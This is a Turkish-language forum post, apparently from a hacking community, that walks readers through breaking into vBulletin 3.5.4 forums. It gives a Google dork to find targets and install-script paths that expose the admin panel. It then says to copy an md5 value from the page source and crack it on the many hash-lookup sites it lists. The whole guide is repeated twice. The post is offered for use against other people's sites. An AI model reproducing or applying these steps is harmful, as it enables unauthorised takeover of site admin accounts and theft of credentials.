ALINTI DEĞİL.
Merhaba arkadaşlar VBulletinde önemli bir açığı sizlere aktaracağım..
Google aramasını aşağıdaki linkten yapıyoruz.
http://www.google.com.tr/search?q="Powered+by+vBulletin+Version+3.5.4"&hl=tr&start=80&sa=N
Önümüze çıkan sitelerden istediğimizi seçiyoruz.
Site;
www.siteadi.com şeklinde ise /forum/install/tableprefix.php
www.siteadi.com/forum şeklinde ise /install/tableprefix.php
kodlarını giriyoruz.
Karşımıza admin paneli çıkmışsa şansımız iyi gitmiş demektir. Admin paneli çıkana kadar deniyoruz we panel çıktıktan sonra..
Sağ tıklayıp "Kaynağı Görüntüle" diyoruz.
Azıcık aşagılara baktığımızda
<form action="../login.php" method="post" name="loginform" onsubmit="md5hash(vb_login_password, vb_login_md5password, vb_login_md5password_utf); js_do_options(this)">
<input type="hidden" name="url" value="/forum/install/tableprefix.php" />
<input type="hidden" name="s" value="10193c3c9b32c5f12085da9c2c90f87e" />
<input type="hidden" name="logintype" value="cplogin" />
<input type="hidden" name="do" value="login" />
<input type="hidden" name="vb_login_md5password" value="" />
<input type="hidden" name="vb_login_md5password_utf" value="" />
<p> </p><p> </p>
gibi yazıların olduğu bölümde kalın olarak gösterdiğim gibi kodlar vardır. Bunu kopyala yapıyoruz ve md5 kırıcı sitelerden birine giriyoruz. Bu kodu arattığımızda şanslı isek bize parolayı veriyor. Bu yöntem çook sabır gerektirir. İnşallah anlatabilmişimdir..
md5 kırıcı bazı siteler:
milw0rm
http://www.milw0rm.com
Gdataonline
http://gdataonline.com/seekhash.php
Securitystats
http://www.securitystats.com/tools/hashcrack.php
md5.rednoize
http://md5.rednoize.com
md5lookup
http://www.md5lookup.com/?category=main&page=search
md5crack.it
http://md5crack.it-helpnet.de/index.php?op=entries
csthis
http://www.csthis.com/md5/index.php
xmd5
http://www.xmd5.org/index_en.htm
neeao
http://www.neeao.com/md5/
mmkey
http://www.mmkey.com/md5
3rb3r
http://c3rb3r.openwall.net/mdcrack/
Hashchecker
http://www.hashchecker.com
OpHCrack
http://lasecwww.epfl.ch/~oechslin/projects/ophcrack/
Plain-Text
http://www.plain-text.info
Merhaba arkadaşlar VBulletinde önemli bir açığı sizlere aktaracağım..
Google aramasını aşağıdaki linkten yapıyoruz.
http://www.google.com.tr/search?q="Powered+by+vBulletin+Version+3.5.4"&hl=tr&start=80&sa=N
Önümüze çıkan sitelerden istediğimizi seçiyoruz.
Site;
www.siteadi.com şeklinde ise /forum/install/tableprefix.php
www.siteadi.com/forum şeklinde ise /install/tableprefix.php
kodlarını giriyoruz.
Karşımıza admin paneli çıkmışsa şansımız iyi gitmiş demektir. Admin paneli çıkana kadar deniyoruz we panel çıktıktan sonra..
Sağ tıklayıp "Kaynağı Görüntüle" diyoruz.
Azıcık aşagılara baktığımızda
<form action="../login.php" method="post" name="loginform" onsubmit="md5hash(vb_login_password, vb_login_md5password, vb_login_md5password_utf); js_do_options(this)">
<input type="hidden" name="url" value="/forum/install/tableprefix.php" />
<input type="hidden" name="s" value="10193c3c9b32c5f12085da9c2c90f87e" />
<input type="hidden" name="logintype" value="cplogin" />
<input type="hidden" name="do" value="login" />
<input type="hidden" name="vb_login_md5password" value="" />
<input type="hidden" name="vb_login_md5password_utf" value="" />
<p> </p><p> </p>
gibi yazıların olduğu bölümde kalın olarak gösterdiğim gibi kodlar vardır. Bunu kopyala yapıyoruz ve md5 kırıcı sitelerden birine giriyoruz. Bu kodu arattığımızda şanslı isek bize parolayı veriyor. Bu yöntem çook sabır gerektirir. İnşallah anlatabilmişimdir..
md5 kırıcı bazı siteler:
milw0rm
http://www.milw0rm.com
Gdataonline
http://gdataonline.com/seekhash.php
Securitystats
http://www.securitystats.com/tools/hashcrack.php
md5.rednoize
http://md5.rednoize.com
md5lookup
http://www.md5lookup.com/?category=main&page=search
md5crack.it
http://md5crack.it-helpnet.de/index.php?op=entries
csthis
http://www.csthis.com/md5/index.php
xmd5
http://www.xmd5.org/index_en.htm
neeao
http://www.neeao.com/md5/
mmkey
http://www.mmkey.com/md5
3rb3r
http://c3rb3r.openwall.net/mdcrack/
Hashchecker
http://www.hashchecker.com
OpHCrack
http://lasecwww.epfl.ch/~oechslin/projects/ophcrack/
Plain-Text
http://www.plain-text.info
